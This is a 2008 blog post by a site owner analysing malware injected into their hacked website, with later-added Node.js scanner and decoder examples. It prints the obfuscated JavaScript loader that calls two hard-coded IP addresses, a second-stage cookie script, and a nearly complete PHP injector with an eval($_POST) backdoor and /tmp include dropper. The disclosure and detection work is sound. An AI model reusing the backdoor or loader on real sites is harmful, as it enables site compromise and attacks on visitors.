Thursday, December 18, 2008

Hacked... again....



Hackers claiming to be Muslims from Turkey hacked the site the other day, so I've just spent the evening reloading most of the files from backup. Although only a couple of files were visibly changed, almost every HTML file and a scattering of PHP files had code inserted into them, and what that code did was not obvious at first glance.

What I don't understand is that if you are going to go to the trouble of hacking a site and then stealthily inserting code which obviously does something of benefit to the perpetrator, why would you write your name on the index page as a red flag to say this site has been hacked? Surely if I was a hacker I would just insert the code quietly and then nobody would know it was there unless they did a full site compare. Unless you wanted a site to look like it had been hacked by someone else..... hmmmm

Anyway, I'm off to review my file permissions and PHP code across the site... and sift through some log files ;)

[EDIT:] Here is the javascript code that was patched into all my webpages. I have renamed the 'eval' function to 'evalDISABLED' so the code cannot run, and broken it into lines:

if(typeof(yahoo_counter)!=typeof(1))evalDISABLED(unescape('%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$
%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\n#do#%63$%75!%6D%65$%6E|%74`%2E%77#%72i@%74%65%28$%22%3C
%2F%74|%65%78%74a#%72e&a|%3E")%3B%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321
!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1"@%5D~;_%3D%31~%3Bi@f$%28%64&%6F%63&%75&%6D%65n&t.c&%6F#ok%69
%65.%6D`a%74#c`%68~(%2F%5C$%62#hg#%66%74%3D#1/&%29=~%3D%6E#u@%6C`l%29!f%6Fr&%28$%69&=|%30%3B#
%69#%3C%32%3B!i|%2B!+#%29doc&%75%6D#%65&%6Et%2Ew&%72%69!t#e@(#"!%3C%73|cr#i%70t%3E`%69!%66~(#_%29$
%64@%6Fcu~%6D@e%6E|t%2E%77`rit%65%28%5C%22!%3C#%73%63%72!ip&t%20~id=%5F&"%2Bi!+"_`%20s`%72c=//%22~
+`%61@%5B$%69%5D`+#%22#/%63`%70$%2F%3F&%22&%2B@n$%61%76$%69%67`%61%74!%6F`r#%2Eap!%70#%4E`%61!
m&e!.&%63&h`%61!rA%74!(0`)@%2B"%3E%3C~%5C%5C%2F!%73%63r!%69%70!t!%3E#%5C"&)~%3C%5C/s`%63ri%70%74%3E$
%22%29@;\n%2F@/&%3C%2F%64|%69%76#%3E').replace(/#|\!|@|~|`|\&|\$|\|/g,""));var yahoo_counter=1;


The un-obfuscated version is as follows:

//<div style=display:none>
document.write("</textarea>");
var i,_,a=["78.110.175.21","195.24.76.251"];
_=1;
if(document.cookie.match(/\bhgft=1/)==null)
  for(i=0;i<2;i++)
    document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
//</div>



The WHOIS records for those two IP addresses give the contacts as

person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167

and

person: Andy BIERLAIR
address: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
phone: +352 20.500
fax-no: +352 20.500.500
nic-hdl: AB99-RIPE


The PHP pages had this code inserted (one long line in the original; broken up and commented here, with the base64 string split using PHP's '.' concatenation so it stays a single value):


if(!function_exists('tmp_lkojfghx')){
  // Backdoor: include any dropped file /tmp/m1 .. /tmp/m99, then run whatever PHP arrives in POST parameter tmp_lkojfghx3.
  for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
  if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
  // The block to inject: the base64 decodes to a <script> tag wrapping the "Yahoo! Counter" javascript shown above.
  if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwd'.
    'CBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5c'.
    'GVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYlMkYlM0NkaSU3NiMlMjAhJTczfCU3NCU3OSU2QyU2NSUzRCQlNjQlNjl+JTczYCU3MGxAJ'.
    'TYxeWAlM0FgbiQlNkZgJTZFfGUlM0VcbiNkbyMlNjMkJTc1ISU2RCU2NSQlNkV8JTc0YCUyRSU3NyMlNzJpQCU3NCU2NSUyOCQlMjIl'.
    'M0MlMkYlNzR8JTY1JTc4JTc0YSMlNzJlJmF8JTNFIiklM0IlNzZgJTYxQHIlMjBpfCUyQyU1RnwlMkMlNjFAJTNEJTVCIyUyMjc4fC58MSYlM'.
    'zEwJTJFQDE3QDVgJTJFJiUzMjEhJTIyfiwlMjIxOSElMzV+LiYyIzR+LiUzNyE2YC4yIyUzNSExIkAlNUR+O18lM0QlMzF+JTNCaUBmJCUyO'.
    'CU2NCYlNkYlNjMmJTc1JiU2RCU2NW4mdC5jJiU2RiNvayU2OSU2NS4lNkRgYSU3NCNjYCU2OH4oJTJGJTVDJCU2MiNoZyMlNjYlNzQl'.
    'M0QjMS8mJTI5PX4lM0QlNkUjdUAlNkNgbCUyOSFmJTZGciYlMjgkJTY5Jj18JTMwJTNCIyU2OSMlM0MlMzIlM0IhaXwlMkIhKyMlMjlkb2'.
    'MmJTc1JTZEIyU2NSYlNkV0JTJFdyYlNzIlNjkhdCNlQCgjIiElM0MlNzN8Y3IjaSU3MHQlM0VgJTY5ISU2Nn4oI18lMjkkJTY0QCU2RmN1fi'.
    'U2REBlJTZFfHQlMkUlNzdgcml0JTY1JTI4JTVDJTIyISUzQyMlNzMlNjMlNzIhaXAmdCUyMH5pZD0lNUYmIiUyQmkhKyJfYCUyMHNgJTc'.
    'yYz0vLyUyMn4rYCU2MUAlNUIkJTY5JTVEYCsjJTIyIy8lNjNgJTcwJCUyRiUzRiYlMjImJTJCQG4kJTYxJTc2JCU2OSU2N2AlNjElNzQhJTZF'.
    'YHIjJTJFYXAhJTcwIyU0RWAlNjEhbSZlIS4mJTYzJmhgJTYxIXJBJTc0ISgwYClAJTJCIiUzRSUzQ34lNUMlNUMlMkYhJTczJTYzciElNjklNzAh'.
    'dCElM0UjJTVDIiYpfiUzQyU1Qy9zYCU2M3JpJTcwJTc0JTNFJCUyMiUyOUA7XG4lMkZALyYlM0MlMkYlNjR8JTY5JTc2IyUzRScpLnJlcGx'.
    'hY2UoLyN8XCF8QHx+fGB8XCZ8XCR8XHwvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY'.
    '3JpcHQ+Cg=='));
  // Output-buffer callback. Strips other gangs' obfuscated <script> blocks and any stale copy of its own,
  // then appends a fresh copy before </body> (gzip-encoded output is inflated first and re-encoded after).
  function tmp_lkojfghx($s){
    if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
    if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){
      $e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
      if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
    }
    // This regex decodes to: #<script language=javascript><!-- Yahoo! Counter starts.+?</script>\n#s
    $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);
    if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
    elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
    return $g?gzencode($s):$s;
  }
  // Installs the output buffer underneath any buffers already open. It is also registered as the error
  // handler below (chaining to the previous handler via $GLOBALS['tmp_xhgfjokl']), so the first PHP warning
  // on a page re-runs it and re-arms the buffer.
  function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
    $s=array();
    if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
    foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
    for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
    ob_start('tmp_lkojfghx');
    for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
  }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2();


That whole base64-encoded string decodes to a <script> tag containing the same javascript seen above, wrapped between the comment markers "<!-- Yahoo! Counter starts" and "<!-- counter end -->". The PHP around it does more than carry the payload: it registers tmp_lkojfghx as an output-buffer handler (and as the error handler, so a PHP warning on any page re-arms it) which strips other obfuscated <script> blocks from the page, removes any stale copy of its own block, and appends a fresh one before </body>. It also includes any file /tmp/m1 to /tmp/m99 that exists and evals whatever is sent in the POST parameter tmp_lkojfghx3, which is a general-purpose backdoor: restoring the HTML files alone would leave the attacker a way back in. I have emailed the ISP managers for the IP addresses pointed at by the code and they can investigate further should they wish.
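To find both halves of this on a server without reading every file by hand, here is a small Node.js scanner as an added example (my code, not the author's and not part of the malware). Its signatures are strings that appear verbatim in the PHP and javascript quoted above; its generic check is a port of the filter tmp_lkojfghx itself applies to rival scripts (a <script> block of more than five lines containing a long unbroken quoted run, together with eval, fromCharCode or document.write), which turns the malware's own competitor-removal logic into a detector. The file names and contents are constructed samples, and the copy of the injector in lib/header.php is deliberately trimmed to the backdoor and hook lines; on a real site you would feed it the contents of the web root via fs.readFileSync.

```javascript
// Added example: scanner for the two halves of this infection. Signatures come from the code
// quoted in the post; the heuristic is a port of the filter the PHP injector itself runs over
// rival <script> blocks. File contents below are constructed samples, not files from the author's site.

// Strings that appear verbatim in the injected PHP above.
const PHP_SIGNATURES = [
  { id: "obh-callback", re: /tmp_lkojfghx/ },                               // handler/function names
  { id: "post-eval-backdoor", re: /eval\(\$_POST\[/ },                       // eval($_POST['tmp_lkojfghx3'])
  { id: "tmp-dropper-include", re: /is_file\(\$f='\/tmp\/m'\.\$i\)/ },      // include_once of /tmp/m1..m99
  { id: "error-handler-hook", re: /set_error_handler\('tmp_lkojfghx2'\)/ }, // re-arms the output buffer
];

// Strings from the javascript payload as it is written into served pages.
const JS_SIGNATURES = [
  { id: "yahoo-counter-marker", re: /<!--\s*Yahoo! Counter starts/ },
  { id: "yahoo-counter-guard", re: /typeof\(yahoo_counter\)!=typeof\(1\)/ },
  { id: "eval-unescape-replace", re: /eval\(unescape\('[^']*'\)\.replace\(\/[^/]*\/g,\s*""\)\)/ },
];

// Port of tmp_lkojfghx's own test for "somebody else's obfuscated script": a <script> block of
// more than five lines containing a quoted run of 30+ characters with no whitespace or
// punctuation (or 20+ comma-separated numbers), together with eval/fromCharCode or document.write.
function looksObfuscated(scriptBlock) {
  if (scriptBlock.split("\n").length <= 5) return false;
  const longRun =
    /['"][^\s'".,;?!\[\]:\/<>()]{30,}/.test(scriptBlock) ||
    /[(\[](\s*\d+,){20,}/.test(scriptBlock);
  const hasEval = /\beval\b/.test(scriptBlock);
  return (hasEval && (longRun || scriptBlock.includes("fromCharCode"))) ||
         (longRun && scriptBlock.includes("document.write"));
}

function scanFile(name, content) {
  const hits = [];
  // PHP files can carry both the server-side injector and, in their HTML, the JS payload.
  const sigs = /\.php\d?$/i.test(name) ? [...PHP_SIGNATURES, ...JS_SIGNATURES] : JS_SIGNATURES;
  for (const s of sigs) if (s.re.test(content)) hits.push(s.id);
  const scripts = content.match(/<script\b[\s\S]*?<\/script>/gi) || [];
  if (scripts.some(looksObfuscated)) hits.push("obfuscated-script-heuristic");
  return hits;
}

// files: { path: content }. Returns only the files with findings.
function scanSite(files) {
  const report = {};
  for (const [name, content] of Object.entries(files)) {
    const hits = scanFile(name, content);
    if (hits.length) report[name] = hits;
  }
  return report;
}

// Constructed samples: two clean files, one page carrying the payload as it is delivered (three
// lines, so the heuristic alone misses it), one PHP file with a trimmed copy of the injector, and
// one page with an unrelated multi-line obfuscated script that only the heuristic catches.
const SAMPLE_FILES = {
  "index.html": "<html><body><h1>Welcome</h1>\n<script>var x=1;</script>\n</body></html>",
  "about.html":
    "<html><body><p>About</p>\n" +
    "<script language=javascript><!-- Yahoo! Counter starts \n" +
    "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2F%3C').replace(/#|\\!|@|~|`|\\&|\\$|\\|/g,\"\"));var yahoo_counter=1;\n" +
    "<!-- counter end --></script>\n</body></html>",
  "lib/db.php": "<?php\nfunction db() { return mysql_connect('localhost'); }\n",
  "lib/header.php":
    "<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}" +
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);}" +
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>\n",
  "contact.html":
    "<html><body>\n<script>\n" +
    "var s=\"aGVsbG8gd29ybGQgdGhpcyBpcyBhIGNvbnN0cnVjdGVkIHNhbXBsZQ\";\n" +
    "var t=\"bm90IGEgcmVhbCBwYXlsb2FkIGp1c3QgYSBsb25nIHN0cmluZw\";\n" +
    "var u=s+t;\n" +
    "var v=u.length;\n" +
    "eval(u);\n" +
    "</script>\n</body></html>",
};

console.log(scanSite(SAMPLE_FILES));
```

Note that the payload as delivered is only three lines, so the injector keeps itself under its own five-line threshold; the exact-string signatures are what catch it, while the heuristic is there for whatever the next gang drops in.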


What does the code do? The loop writes two small inline scripts, one per address; each writes a <script src=//ADDRESS/cp/?X> tag only while _ is still 1, where X is the first letter of navigator.appName (presumably so the server can hand out a browser-specific payload). The script served from the first address sets _=0, so the second address is only contacted if the first one does not answer. What http://78.110.175.21/cp/?I returns is currently:
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i
+"_");if(d)d.src=""}evalDISABLED(unescape('%2F/%4A`u#%73!%74%20~%66~u@c#k`%20#of`%66#.
%2E%2E`@%3C#d#%69v%20st%79%6Ce~=@d%69@%73#pl%61~y%3A~n`%6F@n%65$%3E\n~%76@ar|
%20%74@%3D%6E@%65w@ %44$a!t!e#%281#%32@29%39|7$308@30%300);%64!%6F$%63~%75me$n$
%74!.@%63o`ok|%69~e=%22h%67!%66#%74|%3D%31`;$%20#e%78@%70|%69#%72%65`s=%22#%2B
%74|%2E@t%6FG%4D%54!St$r`i`%6E`%67#(%29#+|"; %70%61|%74%68@%3D/%22@;\n%2F@%2F!
%3C/%64`iv|%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));


which un-obfuscates to:

//Just fuck off...<div style=display:none>
var t=new Date(1229973083000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>


which does little more than set the hgft=1 cookie (expiring 22 December 2008) that the first stage tests for, so a browser that has already fetched the payload is not sent it again; the statements in front of the eval also set _=0 and blank the src of the injected script tags, leaving less in the page for anyone who looks. But I would assume that later the hacker would replace this code with something more worthwhile.
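The decoding done by hand above (for the [EDIT] blob and for this second-stage blob) can be done offline without letting a browser run anything. The following is an added example (my code, not part of the original post): it reads the eval(unescape('...').replace(/.../g,"")) wrapper, pulls the junk-character regex out of the wrapper itself (the two stages use different junk sets), percent-decodes exactly as unescape would, and then lists what a defender wants from the result: the IP addresses, the cookie name used as the once-per-visitor marker, and the hard-coded cookie expiry. The two samples embedded below are the blobs quoted above, with the author's line-wrapping and evalDISABLED renaming left in place; it runs under Node.js.

```javascript
// Added example: offline decoder for the eval(unescape('...').replace(/junk/g,"")) wrapper
// used by both stages quoted in the post. Not code from the original page.

// The two obfuscated blobs exactly as they appear above (the author's line-wrapping and
// 'evalDISABLED' renaming retained); quotes and backslashes are escaped for JS string syntax.
const STAGE1_SAMPLE = [
  "if(typeof(yahoo_counter)!=typeof(1))evalDISABLED(unescape('%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$",
  "%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\\n#do#%63$%75!%6D%65$%6E|%74`%2E%77#%72i@%74%65%28$%22%3C",
  "%2F%74|%65%78%74a#%72e&a|%3E\")%3B%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321",
  "!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1\"@%5D~;_%3D%31~%3Bi@f$%28%64&%6F%63&%75&%6D%65n&t.c&%6F#ok%69",
  "%65.%6D`a%74#c`%68~(%2F%5C$%62#hg#%66%74%3D#1/&%29=~%3D%6E#u@%6C`l%29!f%6Fr&%28$%69&=|%30%3B#",
  "%69#%3C%32%3B!i|%2B!+#%29doc&%75%6D#%65&%6Et%2Ew&%72%69!t#e@(#\"!%3C%73|cr#i%70t%3E`%69!%66~(#_%29$",
  "%64@%6Fcu~%6D@e%6E|t%2E%77`rit%65%28%5C%22!%3C#%73%63%72!ip&t%20~id=%5F&\"%2Bi!+\"_`%20s`%72c=//%22~",
  "+`%61@%5B$%69%5D`+#%22#/%63`%70$%2F%3F&%22&%2B@n$%61%76$%69%67`%61%74!%6F`r#%2Eap!%70#%4E`%61!",
  "m&e!.&%63&h`%61!rA%74!(0`)@%2B\"%3E%3C~%5C%5C%2F!%73%63r!%69%70!t!%3E#%5C\"&)~%3C%5C/s`%63ri%70%74%3E$",
  "%22%29@;\\n%2F@/&%3C%2F%64|%69%76#%3E').replace(/#|\\!|@|~|`|\\&|\\$|\\|/g,\"\"));var yahoo_counter=1;",
].join("\n");

const STAGE2_SAMPLE = [
  "_=0;for(i=0;i<9;i++){var d=document.getElementById(\"_\"+i",
  "+\"_\");if(d)d.src=\"\"}evalDISABLED(unescape('%2F/%4A`u#%73!%74%20~%66~u@c#k`%20#of`%66#.",
  "%2E%2E`@%3C#d#%69v%20st%79%6Ce~=@d%69@%73#pl%61~y%3A~n`%6F@n%65$%3E\\n~%76@ar|",
  "%20%74@%3D%6E@%65w@ %44$a!t!e#%281#%32@29%39|7$308@30%300);%64!%6F$%63~%75me$n$",
  "%74!.@%63o`ok|%69~e=%22h%67!%66#%74|%3D%31`;$%20#e%78@%70|%69#%72%65`s=%22#%2B",
  "%74|%2E@t%6FG%4D%54!St$r`i`%6E`%67#(%29#+|\"; %70%61|%74%68@%3D/%22@;\\n%2F@%2F!",
  "%3C/%64`iv|%3E').replace(/@|\\!|~|\\?|#|\\$|`|\\|/g,\"\"));",
].join("\n");

// Recover the plaintext javascript from one wrapper. Works for 'eval' or the author's 'evalDISABLED'.
function decodeYahooCounter(src) {
  // Locate the quoted payload and the junk-character alternation inside the wrapper itself.
  const m = /unescape\('([\s\S]*?)'\)\.replace\(\/([\s\S]*?)\/g,\s*""\)/.exec(src);
  if (!m) throw new Error("eval(unescape(...).replace(...)) wrapper not found");
  const literal = m[1]
    .replace(/\r?\n/g, "")   // undo the line-wrapping added when the blob was pasted into the post
    .replace(/\\n/g, "\n");  // \n is the only string escape these payloads use
  // Mirror the browser exactly: percent-decode first, then strip the junk characters.
  return unescape(literal).replace(new RegExp(m[2], "g"), "");
}

// Pull the indicators a defender wants out of the decoded script.
function extractIndicators(decoded) {
  const uniq = (xs) => [...new Set(xs)];
  const ips = uniq(decoded.match(/\b(?:\d{1,3}\.){3}\d{1,3}\b/g) || []);
  // Cookie names: the one the loader tests for (stage 1) and the one the payload sets (stage 2).
  const cookies = uniq([
    ...[...decoded.matchAll(/document\.cookie\.match\(\/\\b([A-Za-z0-9_]+)=/g)].map((x) => x[1]),
    ...[...decoded.matchAll(/document\.cookie\s*=\s*"([A-Za-z0-9_]+)=/g)].map((x) => x[1]),
  ]);
  // Hard-coded expiry (epoch milliseconds) if the payload builds a Date from one.
  const d = /new Date\((\d{10,13})\)/.exec(decoded);
  const expires = d ? new Date(Number(d[1])).toISOString() : null;
  return { ips, cookies, expires };
}

for (const [name, blob] of [["stage 1", STAGE1_SAMPLE], ["stage 2", STAGE2_SAMPLE]]) {
  const decoded = decodeYahooCounter(blob);
  console.log("--- " + name + " ---\n" + decoded + "\n", extractIndicators(decoded));
}
```

Taking the junk regex from the wrapper rather than hard-coding it matters here: stage 1 strips "#!@~`&$|" while stage 2 strips "@!~?#$`|", and a decoder that assumed one set would leave stray characters in the other stage's output.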

1 Comment:

At 4:38 pm, Blogger fdask said...

Thanks for the shared info! Someone I know discovered some strange Javascript executing on a login page to one of their sites earlier today.

After some unescaping, I found a few terms which led me here.

Did you ultimately discover how the culprits were able to get into your site and drop the code bits?
